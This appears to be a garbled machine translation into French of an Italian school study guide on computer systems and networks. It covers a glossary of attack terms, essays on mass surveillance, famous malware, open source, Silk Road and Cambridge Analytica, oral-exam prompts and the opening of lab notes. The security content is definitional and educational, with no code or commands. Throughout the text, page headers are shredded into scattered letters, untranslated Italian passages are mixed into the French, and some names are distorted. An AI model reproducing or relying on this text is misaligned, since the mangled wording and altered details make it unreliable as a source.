AUTR
E
É
E
TS
.O
U
.D
P
.T
A
P
ISINTS

Ingénierie sociale : ensemble des techniques pour extorquer des informations à une personne pour
pouvoir l'exploiter pour réaliser des attaques actives contre un système informatique.

DoS : typologie d'attaque active dans laquelle on cherche à rendre un service inutilisable (Déni de service)
Service)

DDoS : attaque DoS de type distribué, c'est-à-dire réalisée en utilisant plusieurs postes d'attaque
(surtout bot).

Bot : abréviation de robot. Généralement, ce sont des logiciels qui effectuent des opérations.
automatizzate.

Spoofing : définit une technique d'attaque basée sur la falsification de l'information (à


exemple l'identité de l'utilisateur, l'adresse IP, etc...)

Le spoofing ARP : attaque qui repose sur la modification des tables ARP afin de réaliser un
MITM

MITM : indique une attaque de type Homme du Milieu, où un utilisateur s'interpose dans
communication entre deux hôtes pour en tirer des informations, de manière invisible pour les hôtes eux-mêmes.

Ingénierie inverse : technique par laquelle on essaie de reconstruire un code source à partir d'un
code compilé.

CSRF - Contre l'Usurpation de Requête Inter-Site : attaque qui repose sur la réutilisation sur Internet de
sessions utilisateur pour effectuer des actions nuisibles. Un cracker fait visiter son propre site par
victime pendant qu'elle est connectée à un site cible, elle réutilisera donc une action HTTP exécutée
de la victime sur son propre site en l'envoyant correctement au site cible en exploitant la
sessione encore active, ce qui permettra d'effectuer des actions non autorisées.

XSS - Cross-Site Scripting : ce sont des attaques qui exploitent les vulnérabilités des sites web (souvent
non mis à jour) par lequel on injecte (injection) des scripts malveillants dans des pages web, qui
permettent de diffuser des logiciels malveillants ou de voler des informations aux utilisateurs.

Élévation de privilèges : technique d'attaque active qui exploite des vulnérabilités d'un
GU
D
ID
EE
T
SHÉMA
T
QIUESR
TÉSEAUX
POUA
RUE
T
É
O
TT
.S
O
U
.D
.P
T
P
A
S
INTS

Deauth WiFi : technique de type DoS qui permet d'exploiter le protocole 802.11 pour
déconnecter un utilisateur du réseau WiFi s'il est combiné avec une technique de spoofing IP
victime.

Violation de données : c'est un incident informatique qui implique la violation d'informations confidentielles.

L'écoute : attaque passive qui implique l'écoute et l'interception non autorisée de données et
communications.

Meltdown et Spectre : vulnérabilités découvertes récemment (2018) qui concernent les CPU Intel,
AMD et ARM (les principaux producteurs mondiaux) qui permet aux programmes qui l'exploitent
d'accéder à des zones de mémoire non autorisées d'autres programmes.

Rootkit : logiciels malveillants utilisés pour accéder aux ressources d'un système sans
autorisation.

Ping of Death : attaque de type DoS qui exploitait une vulnérabilité du protocole IP via
envoi de commandes ping modifiées de manière appropriée pour provoquer un débordement de tampon dans les systèmes

causant le crash.

Point d'accès rogue : point d'accès inséré sans autorisation dans un réseau ou dans une zone couverte par
un réseau sans fil, dans le but d'effectuer des attaques MITM, du phishing, etc...

Défiguration : attaque active dans laquelle un site est remplacé par un site malveillant.

Serveur Rogue : c'est un serveur DHCP qui est inséré sans autorisation dans un réseau dans le but
de faire authentifier les victimes (en profitant du fonctionnement du DHCP, qui prévoit l'envoi dans
diffusion de demandes de configuration IP) afin de fournir une configuration
généralement utilisée pour utiliser des passerelles ou des DNS malveillants pour des attaques MITM ou pour

effectuer du phishing etc...


GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS

APPROFONDIMENTI:
SÉCURT

NATO
INALE
VS
PRV
IACY

L'HISTOIRE

L'aspectdelasécuriténationaleahistoriquementjouéunrôledominantdansla
discussion sur la vie privée et l'intrusion de tiers dans les communications d'autrui. Depuis les années
Soixante sont des opérations notables à l'échelle mondiale de « Signal Intelligence » (SIGINT), c'est-à-dire la
collecte de données et d'informations à travers l'interception et l'analyse de signaux, qu'ils soient de nature
humaine, soient envoyés par des machines et des ordinateurs. Une des premières opérations à être réalisée
l'attention publique fut le projet « Echelon », par lequel plusieurs Nations
ils effectuent un suivi automatisé de milliards de communications,
principalement par e-mail, transitant sur internet, avec une large utilisation de l'interception directe
des grandes dorsales sous-marines de connexion intercontinentale. Non seulement des mots-clés uniques
elles sont interceptées, mais en utilisant des algorithmes innovants, des caractéristiques sont analysées
plus profondes, quel contexte sémantique et empreintes vocales. En nous déplaçant dans des temps plus

récemment, en 2013, les révélations d'Edward Snowden ont suscité un grand émoi, à l'époque
ancien technicien de la CIA (Central Intelligence Agency, l'agence de renseignement civile des États-Unis)
d'Amérique) et consultant de la NSA (National Security Agency, organisme gouvernemental des
États-Unis d'Amérique qui, avec la CIA et le FBI, s'occupe de la sécurité nationale)
publiés dans une série d'enquêtes journalistiques sur 'The Washington
Post" aux États-Unis (publication rendue célèbre par les enquêtes dans les années soixante-dix sur l'affaire "Watergate")
e au Royaume-Uni sur "The Guardian", accompagnées de la publication de dizaines de documents
réservés à la sécurité nationale qu'il avait recueillis pendant son travail pour la NSA, révélant
détails de différents programmes top-secrets de surveillance de masse opérés par le gouvernement
états-unien et britannique, également dans ce cas par le biais de l'interception des
communications à grande échelle, basées surtout sur l'analyse des "métadonnées", c'est-à-dire
informations qui sont ajoutées aux données échangées sur un réseau pour les décrire. À
par exemple, un fichier ou un document peut contenir en son sein des métadonnées avec des informations
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
SO
T
É
.T
P
.P
U
T
.S
IIDA
INTS

cryptographie, tandis que la messagerie instantanée comme Whatsapp et Telegram est signalée
l'utilisation de la cryptographie de bout en bout, une technique de chiffrement de la communication qui permet
seul l'expéditeur et le destinataire peuvent lire les messages échangés. Tout cela rassure l'utilisateur, mais
n'est réellement suffisant pour garantir que la vie privée de l'individu soit respectée, car
il s'agit simplement d'une illusion de sécurité et d'anonymat. Si la communication est protégée par
l'accès externe et maintient la confidentialité, il en va autrement pour les métadonnées associées, qui
sont souvent diffusés en clair, sans cryptage), et en fait sont à la disposition de
sociétés qui fournissent le service, aussi bien que celles qui sont capables d'intercepter les communications, et
je suis capable de révéler beaucoup plus d'informations que l'utilisateur ne pourrait le penser, ou
être simplement conscient.

CN
IEFORUC
M
«T
I:Z
IENFOUR
»

Réalisé par Laura Portrais, Genre Documentaire - USA, 2014. Prix Oscar 2015 Meilleur
Documentaire.

Le documentaire raconte le scandale de la surveillance de masse par la NSA, la


Agence nationale de sécurité américaine. La réalisatrice, particulièrement active dans les documentaires
sur la surveillance des citoyens par les États-Unis à la suite des événements du 11 septembre 2001, était
stata contactée par un e-mail chiffré d'un inconnu utilisant le pseudonyme
CitizenFour , che dichiarava di poter mettere a disposizione documenti top secret
concernant les activités de la NSA au détriment de la vie privée des individus. L'inconnu est
Edward Snowden, un ancien technicien informatique de la CIA et collaborateur de la NSA, qui fut
sconvolto sur le plan éthique personnel par les activités secrètes de surveillance de masse avec lesquelles on
era imbattuto nel suo lavoro. Snowden est en jargon un « whistleblower », c'est-à-dire celui qui signale
activités illégales d'un gouvernement ou d'une entreprise. Actuellement, il a obtenu l'asile
politico en Russie ; le gouvernement américain a déclaré suite à ces divulgations
Snowden coupable d'espionnage, tandis que le parlement européen a reconnu son
statut d'informateur et de défenseur international des droits de l'homme et a demandé aux États
membres de l'interdire l'extradition.
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E

T
S
.T
O
.U
P
.T
D
P
SIANTS

APPROFONDISSEMENTS :
VIRUS
À
LAMODE

L'HISTOIRE

Très souvent, les auteurs de virus et d'attaques informatiques choisissent des noms particulièrement
"divertissants" et appropriés. En 1998, un Taïwanais a développé un virus pour Windows 95.
chiamato Chernobyl, che si diffuse sui computer di mezzo mondo infettando addirittura CD
pièces jointes à des revues et ordinateurs neufs préinstallés, qui s'activait automatiquement le 26 avril
(anniversaire de Tchernobyl, précisément) avec un effet dévastateur car il réécrivait le BIOS
rendant les PC hors d'usage (et les cartes mères à jeter...).

En 2017, l'une des pires infections par ransomware de l'histoire s'est produite via
l'exploit EternalBlue. L'exploit exploite une vulnérabilité de Windows, et a été rendu public par un groupe
hacker le 14 avril. Exactement un mois avant, Microsoft avait déjà publié un correctif de
la sécurité qui corrigeait précisément la faille exploitée par EternalBlue, mais qui ne couvrait pas
exemple Windows XP, Windows 8 et Windows Server 2003. Cependant, ces versions étaient (et
probablement encore largement utilisées, et pas tout le monde avait pris des dispositions pour
mettre à jour ses systèmes avec Windows Update. Le 12 mai, le ver WannaCry est venu
lancé dans le monde entier par un groupe de hackers, frappant en quelques jours plus de 200 000
computer nel mondo, facendo vittime anche in importanti aziende di telecomunicazioni e
ministère.
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS

intérêt pour l'IoT). En s'appuyant sur les "utonti" (mais aussi sur les utilisateurs un peu plus expérimentés)
exploiter des techniques d'ingénierie sociale, les effets sont souvent dévastateurs, surtout
parce qu'ils sont capables de paralyser et de mettre en crise des entreprises et des organismes gouvernementaux. En 2019

plusieurs villes des États-Unis ont été touchées par des attaques par ransomware : la petite ville
la ville de Lake City en Floride a choisi de payer environ 400 mille dollars en bitcoin (monnaie
particulièrement appréciée des criminels car difficilement traçable) pour débloquer les
services appropriés (mais sans y parvenir complètement, d'ailleurs il n'est pas garanti que traiter avec
un criminel ait des garanties); Baltimore en revanche a refusé de payer la rançon et s
estime qu'il a dû dépenser environ 5 millions de dollars pour la restauration des systèmes.

À part le caractère spectaculaire des cas, cela attire l'attention sur le principal facteur utilisé par
criminels pour attaquer : l'utilisateur. C'est souvent un employé distrait, inexpérimenté, ou même
credulone à compromettre un système entier avec un simple clic sur une pièce jointe d'une
mail. Oppure un tecnico responsabile della manutenzione della rete informatica, o un
administrateur réseau, qui traite légèrement les mises à jour du système d'exploitation et des
logiciels en cours utilisés, ou sous-estime les problèmes de sécurité possibles, tels que la
nécessité d'un pare-feu ou de la garde des mots de passe. Il suffit de vérifier combien de
des entreprises et des bureaux publics utilisent encore des systèmes basés sur Windows XP ou Windows 7
qui n'ont même plus le support de Microsoft. Souvent, il manque aussi des séries
procédures de sauvegarde et de reprise après sinistre.

GLOSSAIRE

Utonto : dans le jargon informatique (dettoluserin en anglais, contraction de loser et user) est le typique
utilisateur inexpérimenté utilisant un système, et qui ne se préoccupe pas vraiment des risques
qui peuvent en découler.

Ransomware : c'est un malware qui vise à limiter l'accès à l'appareil qu'il infecte.
exemple de cryptage des données à l'aide d'une clé secrète pour les rendre illisibles)
demandant une rançon à payer à l'utilisateur final. C'est précisément les attaques par cryptographie
ils sont particulièrement efficaces car ils sont difficiles à résoudre. Ils sont souvent véhiculés
par ingénierie sociale, en exploitant l'inexpérience des utilisateurs d'ordinateurs. Ou bien, et c'est
le pire des cas, ils exploitent des 0-days.
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E

T
S
.T
O
.U
P
.T
D
P
SIANTS

APPROFONDISSEMENTS :
MA
N
ITENANO
TUVER
V
T
LSOG
C
IE
IL
LIBERO
Open Source : définit un logiciel dont le code source est public. Il repose sur les éléments suivants
principes

• Liberté de redistribution du logiciel (même payant);


• Liberté de consulter le code source;
• Nécessité d'approbation pour les produits dérivés;
• Integrità del codice sorgente dell'autore;
• Aucune discrimination envers des individus ou des groupes de personnes;
• Aucune discrimination envers les secteurs d'application (par exemple, limites d'utilisation dans le domaine
académique ou non commercial) ;
• La licence doit être distribuable;
• La licence ne peut pas être spécifique à un produit;
• La licence ne peut être étendue à d'autres logiciels distribués simultanément;
• La licence doit être technologiquement neutre (c'est-à-dire indépendante des technologies)
qu'ils peuvent limiter la distribution).

Avantages de l'Open Source : un logiciel peut disposer de communautés qui opèrent dans
de manière continue et productive sur le code. Les communautés offrent un soutien, des ressources et
nouvelles fonctionnalités, même au niveau des idées. Mises à jour pour les bugs et les vulnérabilités
ils peuvent recevoir des interventions rapides. On peut modifier le code pour résoudre
problématiques spécifiques à son domaine de travail ou de recherche. De plus, étant le
le code est librement consultable, vous êtes assuré de son intégrité et de l'absence de
exemple de malware, spyware ou backdoor.

Avantageséconomiquesdel'OpenSource:lesentreprisespeuventrépartirlescoûtsdedéveloppement
Parmi eux, même entre concurrents. Les coûts de support dans le logiciel propriétaire sont réduits.
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTOT
SE
O
ÉT
.P.U
P
T
.S
ID
IA
INTS

successivamente del supporto della community). Oppure aziende investono nello sviluppo
un produit open source pour détenir une position dominante sur le marché,
obtenir des revenus grâce aux redevances et à d'autres produits véhiculés par le logiciel : un exemple en est
Mozilla Firefox, qui a gagné plus de 500 millions de dollars grâce aux redevances en 2017
payées par les investisseurs (souvent liées à l'utilisation de leur propre moteur de recherche configuré
comme page d'accueil).

Logiciel libre : c'est un type de licence qui définit un logiciel garantissant plusieurs libertés.
à l'utilisateur :

• Liberté d'utiliser le programme sans entraves;

• Liberté d'aider soi-même en étudiant le code disponible et en le modifiant en fonction de


propres besoins;

• Liberté d'aider d'autres utilisateurs, c'est-à-dire la possibilité de distribuer des copies du logiciel;

• Liberté de publier une version modifiée du logiciel.

À ne pas confondre avec des logiciels gratuits.

Unix : système d'exploitation propriétaire principalement utilisé dans les systèmes mainframe,
développé par les laboratoires AT&T et Bell.

Linux : c'est le premier système d'exploitation exemple de logiciel libre, réalisé à l'origine par la Free
Software Foundation, organisation à but non lucratif fondée par Richard Stallman en
années quatre-vingt pour éliminer les restrictions sur la copie, la redistribution, la compréhension et
modification du logiciel, avec l'objectif initial de créer une alternative libre à Unix. Le noyau
écrit par l'étudiant finlandais de l'époque Linus Torvalds.

Le noyau : c'est le logiciel qui gère l'accès au matériel pour les processus en cours d'exécution sur un
ordinateur.

Lois de Brooks : « ajouter des programmeurs à un logiciel en retard le


sera encore plus retardé”. Souvent, l'open source est utilisé pour contredire cette loi,
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

APPROFONDISSEMENTS :
GUERRE CYBERNÉTIQUE
Étrange jeu. Le seul coup gagnant est de ne pas jouer.

CN
IEFORUM
W
«:ARGAMES
»

Réalisé par John Badham. Genre Science-fiction - États-Unis, 1983.

Le film champion du box-office en 1983 anticipe pour la première fois l'opinion publique
le thème de la cyberguerre, c'est-à-dire les effets d'une offensive potentielle
militaire ou criminel envers des systèmes informatiques, ou simplement (et c'est l'intrigue du film) par
partie d'un hacker ignorant et bricoleur.

Le film montre des techniques de hacking de l'époque (qui sont les premières de l'histoire) telles que le
phreaking (ben nota à Kevin Mitnick), les attaques par force brute (pour identifier des systèmes
à qui se connecter en appelant le modem à des numéros en séquence), l'accès à des systèmes non
protégés par une authentification sécurisée (le protagoniste qui accède au registre électronique de la
école et on change la note), l'ingénierie sociale (avec laquelle on remonte au mot de passe
du compte du créateur du système de sécurité, avec un accès identifiable presque comme
une porte dérobée) et la tromperie cybernétique (avec laquelle le système est trompé empêchant la
«guerre nucléaire mondiale» simplement en le mettant en échec en jouant au morpion avec soi-même
même)

Le Président des États-Unis Ronald Reagan a été impressionné par le film et a demandé à ses experts
si les systèmes informatiques du gouvernement pouvaient être attaqués de manière si simple (ou fortuite).
Depuis 1967, il existait des rapports techniques sur les vulnérabilités possibles de tels systèmes, mais
Ils avaient été ignorés. Étant donné la réponse affirmative de la part des experts, Reagan a fait promulguer
les premières lois relatives aux délits informatiques (le Computer Fraud and Abuse Act) et
intensifier les mesures de sécurité par une directive classée (la NSDD-145) contre
les menaces informatiques.

Malgré les actes et les directives, cela démontre toujours que l'homme est toujours le point faible.
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E

T
S
.T
O
.U
P
.T
D
P
SIANTS

ridurre il ritardo nel lancio di un missile durante una crisi militare, nel caso in cui il
Le président ne se souvient pas du mot de passe.

GLOSSAIRE

La tromperie cybernétique : c'est l'ensemble des techniques et des stratégies fondées sur la tromperie
potentiels attaquants à un système. Il repose généralement sur le détournement, le drainage de
ressources (par exemple avec de fausses informations et des systèmes leurre, des pièges à miel), sur l'effet

Farewell (cela fait douter l'adversaire de l'intégrité des données volées, le nom est lié à
une opération de la CIA contre le KGB dans les années 80), sur l'analyse des modalités de
opération et réaction de l'adversaire (une fois identifié, on essaie de l'attaquer
directement, pour apprendre de nouvelles informations), et sur l'identification à travers des mines et
trappole
GU
D
IT
D
E
S
H
E
IÈME
R
S
TÉSEAUX
POUR
L
A
ES
U
É
T
T.U
O
T
.D
O
S
A
.IT
P
N
P
S
ITS

APPROFONDIMENTI:
LÉGALITÉ
ET
DEEP
WEB
CN
IEFORUM
"W
- EB
PROFOND"

Réalisé par Alex Winter. Genre Documentaire - États-Unis, 2016.

Deep Web raconte l'arrestation en 2013 de Ross Ulbricht, alors âgé de 29 ans, jeune
insoupçonnable, diplômé en Physique et accusé d'être connu sur Internet sous le nom de "Dread Pirate"
Roberts". Il se base sur des interviews exclusives des parents d'Ulbricht, devenus des publics
soutiens des droits numériques et du juste procès. Ulbricht a fondé Silk Road, tristement célèbre
marché noir en ligne mieux connu pour le trafic de drogues, de médicaments, d'armes, de données de compte
bancari, matériel pédopornographique, services criminels sur commande. Sur le portail, les utilisateurs
ils s'enregistraient (anonymement évidemment) en utilisant la plateforme pour vendre et
acquérir, comme cela se passe sur eBay ou Amazon. Silk Road gagnait un pourcentage sur les
transactions, mais théoriquement il ne vendait rien directement, c'étaient les utilisateurs. Tout comme
eBay. Le documentaire décrit et approfondit les enquêtes qui ont conduit à l'arrestation de
jeune, (ultérieurement condamné à la réclusion à perpétuité en 2017, jugement considéré par beaucoup
exagérée, mais à son tour nécessaire et exemplary de la part du gouvernement des États-Unis pour donner
un fort signal à ceux qui pensent exploiter l'anonymat du Dark Web à des fins criminelles), et
Explorez avec des interviews exclusives d'experts et de professionnels du Deep Web et du système des Bitcoins
aspects éthiques et juridiques de l'avenir du réseau, et de la liberté et responsabilité des individus sur
web.

Un discours fondamental et délicat est lié à la facilité avec laquelle quiconque pourrait...
anonymat complet s'approcher des drogues via le Dark Web (en donnant en fait la possibilité
même aux plus insoupçonnés ou craintifs de dépasser leurs limites), mais en fait dans un
un environnement plus sûr pour les consommateurs par rapport à la rue (rendant la dégradation et le trafic
Dans tout cela, on se demande quelle est effectivement la
responsabilité d'Ulbricht, de payer seul à la justice une telle note à 29 ans
pour tous les crimes commis via sa plateforme.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

vulnérables.
(D'une lettre d'une mère qui a perdu son fils à cause d'une overdose après avoir acheté de la drogue
sur le portail. Au moins 6 décès confirmés ont été attribués à des overdoses liées à des achats sur
Route de la Soie, pour laquelle Ulbricht a été accusé de responsabilité

GLOSSARIO

Web de surface : la partie du web indexée par les moteurs de recherche.

Deep Web : la partie du web non indexée par les moteurs de recherche. Elle comprend des sites non
encore indexés, sites privés ou "cachés" par les moteurs de recherche.

Dark Web : c'est une partie du Deep Web développée sur des réseaux particuliers, accessibles avec des systèmes
dédiés (par exemple avec le navigateur TOR). Avec cela, on identifie généralement cette partie de
Web profond destiné à des fins criminelles.

TOR : un navigateur dérivé de Mozilla, open source, qui a pour objectif la navigation
réellement anonyme et non traçable sur internet, à travers un système de routage en oignon.

Le routage en oignon : c'est une technique pour anonymiser la communication, à travers


l'encapsulation cryptographique en couches des messages échangés. Les données transitent à travers des
appelés onion router, qui s'occupent d'envoyer à chaque fois à la destination
successive. Chaque étape ne connaît que la position du nœud précédent et suivant,
garantissant l'anonymat de l'expéditeur.

BitCoin : c'est une cryptomonnaie dont la valeur est déterminée par un mécanisme de demande et
offre. Elle est basée sur une base de données distribuée entre les nœuds du réseau où sont suivis les
transazioni e della loro integrità (dettoblockchain), con impiego di tecniche crittografiche
complètes pour la génération de nouvelles monnaies et la définition de la propriété des monnaies
stesse (via une clé privée utilisée comme signature numérique pour son portefeuille). Le
les transactions en attente sont incluses dans la blockchain par un processus appelé
minage, qui maintient un ordre chronologique dans la blockchain, protège la neutralité de la
réseau et permet à différents ordinateurs de s'accorder sur l'état du système. Les règles
les signatures cryptographiques empêchent qu'un bloc précédent soit modifié, car cela
GUD
IE
ST
S
IHEMEE
ST
RÉSEAUX
POUR
AUTOT
SO
ET
P
É
.P
.T
S
.IU
IDA
INTS

APPROFONDISSEMENTS :
PRO
D
A
'FC
L
ID
B
TA
E
G
O
IT
N
A

L'HISTOIRE

Cambridge Analytica est une société née en 2013 spécialisée dans l'analyse de volumes de données
rassemblés à partir des réseaux sociaux, pour la réalisation de campagnes sociales de conditionnement
psychologique des utilisateurs. Le scandale suscité par les révélations d'anciens employés sur le
sfruttamento inconsapevole dei dati (meglio, dei metadati) di milioni di utenti dei social (in
particulier de Facebook) et sur les effets des campagnes profilées mises en œuvre a conduit à
fermeture de la société en 2018 et une amende de 5 milliards de dollars à Facebook (ce que beaucoup
ils ont évalué comme peu, étant donné qu'ils représentent environ 1 dixième du chiffre d'affaires annuel de l'entreprise,

risque par rapport à la gravité de ce qui s'est passé).

La société exploitait de grandes données et des techniques psychométriques pour profiler des individus, à travers

l'utilisation d'algorithmes d'analyse des données collectées combinés avec des techniques de « data mining »
(extraction d'informations à partir de grandes quantités de données). Les données sont obtenues à partir de tout ce qui

qu'un utilisateur effectue sur les plateformes, et ces données sont énormes et si variées que
consentir de définir de manière très précise le comportement psychologique et les attitudes
des personnes. Par exemple, ils étaient recueillis (par eux, mais ils sont encore recueillis
probablement d'autres sociétés) des informations sur les likes, sur les réactions à certains articles et
images, à "histoires", non seulement sur les contenus, mais aussi sur les horaires, sur la localisation
géographique, sur les ethnies des personnes représentées dans les contenus commentés, sur le type de
commenti (positivi o negativi). Inoltre si possono raccogliere informazioni tramite contenuti
mirati à montrer aux individus, avec des campagnes sociales développées sur mesure pour voir comment le
le public réagit. Il arrive souvent de trouver des annonces sponsorisées d'articles, de photos, de pages et
simili sur les réseaux sociaux que nous ne "comprenons" pas toujours, au sens où il ne s'agit pas de publicité classique

di un produit, mais peut-être de pages ou de nouvelles "qui pourraient nous intéresser", et non en
nous comprenons donc la raison. Et aussi des fausses actualités spécialement construites. La réaction à

cliquer, commenter, mettre un j'aime, et le croisement de ces données avec des millions d'autres données
permet de faire comprendre à une machine, grâce à des algorithmes appropriés, ce que nous pensons.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
É
T
SU
O
.D
.PA
.P
T
ISINTS

ton ami (mais nous aurons accès à tout ce que tu fais sur le social)”) mais aussi à celui de
leurs cercles d'amis (fonctionnalité maintenant non présente sur Facebook). Falla qui n'était pas un
un bug, mais une "légèreté" des autorisations, qui permettait à Cambridge Analytica de
accéder à ces données sans violer les conditions de service de Facebook. De cette façon, il a
potu recueillir des données relatives à plus de 80 millions d'utilisateurs. Bien que les gens soient plus
préoccupé que quelqu'un connaisse son mail ou son adresse de résidence, ce n'est pas
suffisamment sensibilisée pour s'inquiéter que quelqu'un collecte des données sur ce qu'elle aime ou
moins, ou sur la manière de commenter un certain contenu.

En plus de ces données, la société achetait des données supplémentaires auprès de sociétés spécialisées, appelées courtiers.

spécialisées dans leur collecte et leur vente. Avec toute cette masse de données, elle a développé un
système de micro-ciblage comportemental, c'est-à-dire envoyer des contenus avec un haut niveau
personnalisation individuelle. On travaille sur les réactions et le comportement de l'utilisateur, et non
sur les préférences et les goûts personnels. Avec ces informations, la société était en mesure de fournir
services de communication stratégique particulièrement appréciés (et efficaces) pour les campagnes
électoraux.

Travoltaparlafuited'informations,desdétailsdesonimplicationontémergé(etdonc
utilisation du micro-ciblage) dans les campagnes qui ont conduit au succès du Brexit au Royaume-Uni
Unito et de la victoire de Trump aux élections présidentielles des États-Unis (comme cas les plus éclatants).

En 1964, le sociologue Marshall McLuhan a publié l'essai "Understanding Media: The


Extensions de l'homme
(« le moyen est le message »), anticipant en fait ce qui deviendrait aujourd'hui Internet.
MacLuhan focalisait l'attention sur la nécessité d'étudier non seulement les contenus, mais aussi
les modalités selon lesquelles ils sont transmis, considérant les médias de communication comme
des technologies non neutres, mais des structures complexes capables d'influencer les destinataires. Ceci
capacité des médias modernes d'influencer l'opinion publique à travers le profilage des
utilisateurs, dérivant de l'analyse de grandes quantités de données et de métadonnées, souvent, comme vu,
raccolti en violant la confidentialité des utilisateurs, montre à quel point il est important d'avoir une plus grande

connaissance des nouvelles technologies de la part de ceux qui utilisent le Net, et de la part de ceux qui en

propose, favorise et, parfois, impose une utilisation toujours plus grande et intégrée dans nos
activités quotidiennes.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

Réalisation de Karim Amer et Jehane Noujaim - Genre : Documentaire - USA 2019 - Exclusif
Netflix.

Le documentaire reconstitue avec précision l'histoire de Cambridge Analytica et approfondit


les techniques utilisées ; il se concentre en particulier sur le scandale avec Facebook, à travers
interviews et reconstitutions en suivant de près les "coulisses" du procès contre Facebook
à travers la lanceuse d'alerte Brittany Keiser (ancienne Directrice Commerciale de Cambridge Analytica),
en interviewant Julian Wheatland (ancien directeur général de Cambridge Analytica), avec
la contribution du professeur d'université de la Parsons School of Design David Carroll (le
primo à porter la société devant le tribunal en lui demandant l'accès à ses propres données) et de la journaliste
del Guardian Carole Cadwal (autrice dello scoop). Riguardo al primo lanceur d'alerte à
rendre public le scandale, Christopher Wylie, seuls des vidéos d'archives sont fournies et non
interviews directes.

GLOSSARIO

Métadonnées : informations qui décrivent d'autres informations. Elles servent par exemple à améliorer
et d'optimiser l'accès à ces informations au sein d'un système informatique. Dans les systèmes
Dans la messagerie, par exemple, les métadonnées peuvent contenir des informations sur l'heure d'envoi du
message, sur le lieu, s'il a été livré ou vu par le destinataire, etc… Dans un document
Le texte peut concerner l'auteur, le programme avec lequel il a été écrit (Word, Open
Bureau), l’heure à laquelle il a été enregistré, révisé, etc...

Fake News : informations inventées ou déformées, spécialement retravaillées pour les rendre virales
et entre-temps générer des réactions appropriées.
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS

EXEMPLE
D
SE
MATÉRA
IUX
POUR
LE
COLLOQUES ORAUX
L'épreuve orale de l'examen d'État consiste en un "entretien" qui commence par un
matériel (initialement appelé « enveloppe »), qui contient une image et éventuellement du
texte, constitué d'extraits de textes de littérature, poésies, photographies, articles de journaux,
graphiques, formules, idées de projets, problèmes : cela dépend de la commission. Il ne faut pas
essayer de forcer des liens, ou perdre du temps à chercher tous les détails possibles dans les photos
o "œuf de Pâques": le contenu de l'enveloppe n'est qu'une suggestion pour amorcer l'entretien,
Il est très probable qu'il sera impossible de relier toutes les matières, et surtout ce n'est pas un quiz.

Voici quelques exemples d'enveloppes (liées aux matières de spécialité) utilisées lors des examens précédents,
Avec des indications sur certains sujets auxquels lier les disciplines de spécialisation.

Cette enveloppe peut être reliée à : cryptographie, sécurité des réseaux, protection des données,
communications par réseau, transmissions numériques, réseaux sans fil, IoT.
GU
D
IE
DE
T
SHÈME
E
SR
TÉSEAUP
X
SO
IUR
AUT
E

T
S
.T
O
.U
P
.T
D
P
SIANTS

Cette enveloppe peut être liée à : cryptographie, légalité (Droit et Constitution),


communications via le réseau, comment fonctionne internet, TCP/IP, services distribués, services cloud
VPN.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS

Cette enveloppe peut être liée à : cryptographie, sécurité des communications, vie privée
(Droit et Constitution), Seconde Guerre mondiale.
GUD
IE
ST
S
IHÈMEE
ST
RÉSEAUX
POUR
AUTOT
SO
ET
P
É
.P
.T
S
.IU
IDA
INTS

Cette enveloppe peut être liée à : l'ingénierie sociale, la sécurité des communications,
réglementation sur la protection des données et les crimes informatiques (Droit et Constitution).
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTOT
SE
O
ÉT
.P.U
P
T
.S
ID
IA
INTS

NOTES
DE
LABORATOR
IE
Voici des notes brèves et concises sur les programmes, commandes, termes, sites utilisés pour les
exercices, avec quelques rappels sur leur utilisation. Étant donné que de nombreux exemples concernent

vulnérabilités et attaques informatiques, il est bon d'effectuer tout via des machines virtuelles, et
se rappeler que le Code Pénal punit les crimes informatiques (à partir de la loi 547 du
1993) quali :

• fraude informatique

• accès, détention et diffusion abusive de codes d'accès à des systèmes informatiques et


télématiques;

• diffusion d'équipements, de dispositifs et de programmes informatiques destinés à nuire


systèmes informatiques et télécommunications.

Par conséquent, n'oubliez pas que ce qui est indiqué dans le Guide suit un objectif précis :

APPRENONÀ
SNOUD
SÉFENDRE
ÉTUDIER C COMMENT S'ATTACHER

N.B. :

• L'adresse IP d'exemple sera souvent indiquée comme [Link], et ira évidemment


remplacé par l'adresse IP effective de la machine utilisée ou cible;

• ilsimbolo #indica un comando da inserire nel terminale o nel software cui si fa


référence.

• Les systèmes d'exploitation et les logiciels sont souvent mis à jour, certains commandes et notes
ils peuvent ne pas fonctionner "toujours", donc considérez le tout comme un point de départ.
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS

MACHV
N
IR
IETUELLE

VirtualBox : est un logiciel open source propriété d'Oracle pour l'exécution de VM. Pour les
il est particulièrement important de configurer l'expérience de laboratoire
carte réseau virtuelle, selon le mode d'utilisation : NAT (le trafic est
masqué comme s'il provenait de la machine hôte, créant un sous-réseau séparé) ou bien
Bridged (la VM obtient sa propre IP).
Pour partager facilement des fichiers entre l'hôte et le client, vous pouvez activer le partage de fichiers : à partir de

menu de la VM démarrée sélectionner Appareils > Dossiers Partagés > Paramètres des Dossiers
